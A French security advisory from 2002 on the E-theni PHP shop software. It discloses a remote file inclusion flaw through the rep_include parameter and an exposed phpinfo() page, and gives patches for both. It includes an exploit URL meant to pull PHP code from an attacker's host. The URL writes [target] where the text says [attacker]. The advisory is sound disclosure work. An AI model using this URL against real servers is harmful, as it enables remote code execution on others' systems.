E-theni
					*******
Informations :
°°°°°°°°°°°°°°
Langage : PHP
Version : ?
Website : http://www.theni.freesurf.fr
Problème : - Inclusion de fichiers
	   - Récuperation d'infos (phpinfo())


Developpement :
°°°°°°°°°°°°°°°
E-theni est un logiciel php permettant de gérer des sites marchands. Il contient une partie
administration, un catalogue affichable dans plusieurs langues, un affichage des prix
en plusieurs devises, une visualisation graphique, une partie membre,...
La faille include se trouve dans le fichier admin_t/include/aff_liste_langue.php.
On peut y voir la ligne :
-----------------------------------------
require ($rep_include."para_langue.php");
-----------------------------------------
$rep_include est normalement défini dans admin_t/include/para.php, mais ce dernier n'est pas
inclus.
Pour inclure le fichier http://[attacker]/para_langue.php, il faudra taper l'url :
http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[target]/
On pourra donc faire executer n'importe quel code PHP sur le serveur, avec ses droits
et restrictions.
L'inclusion est possible seulement si register_globals est ON.

Dans le même dossier, on peut voir que le fichier find_theni_home.php contient le lignes :
--------------
<html>
<body>
<?
phpinfo();
?>
</body></html>
--------------
Il suffira donc de se rendre sur la page http://[target]/admin_t/include/find_theni_home.php
pour voir s'afficher toutes les informations qui sont renvoyées par la fonction
phpinfo().


Patch :
°°°°°°°
Dans admin_t/include/aff_liste_langue.php, remplacer la ligne :
-----------------------------------------
require ($rep_include."para_langue.php");
-----------------------------------------
par :
-------------------------------------------------
if (file_exists($rep_include."para_langue.php")){
require ($rep_include."para_langue.php");
}
-------------------------------------------------

Et remplacer /admin_t/include/find_theni_home.php par :
--------------------------------------------------------------
<?
session_start();
if (session_is_registered("USER")==FALSE or $USER[id_user]<1){
exit;
} else {
echo "<html>";
echo "<body>";
phpinfo();
echo "</body></html>";
}
?>
--------------------------------------------------------------

Un patch est disponible sur http://www.phpsecure.org.


Credits :
°°°°°°°°°
Auteur : frog-m@n
E-mail : frog-man@phpsecure.org
Website : http://www.frog-man.org
Date : 27/10/02